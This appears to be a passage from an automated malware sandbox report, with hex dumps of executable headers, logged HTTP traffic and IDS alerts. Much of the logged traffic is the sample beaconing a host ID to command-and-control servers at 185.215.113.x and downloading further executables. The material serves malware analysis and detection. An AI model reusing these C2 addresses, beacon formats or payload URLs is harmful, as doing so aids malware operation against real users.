00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 01:23:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 00:46:48 GMTETag: "1bea00-623d85b170f6f"Accept-Ranges: bytesContent-Length: 1829376Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 20 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 49 00 00 04 00 00 19 15 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 00 06 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 61 77 6a 6e 79 6d 76 00 50 19 00 00 c0 2f 00 00 50 19 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 64 6b 6c 72 66 69 76 00 10 00 00 00 10 49 00 00 06 00 00 00 c2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 49 00 00 22 00 00 00 c8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000332001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build"doma------CFHDBFIEGIDGIECBKJEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000336001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="build"doma------AEBKKECBGIIJJKECGIJE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 33 41 44 45 33 35 43 45 33 41 33 33 39 37 33 35 34 34 31 38 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 2d 2d 0d 0a Data Ascii: ------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="hwid"53ADE35CE3A33973544187------GIDBKKKKKFBGDGDHIDBGContent-Disposition: form-data; name="build"doma------GIDBKKKKKFBGDGDHIDBG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49810 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49842 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49842 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49879 -> 185.215.113.103:80
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
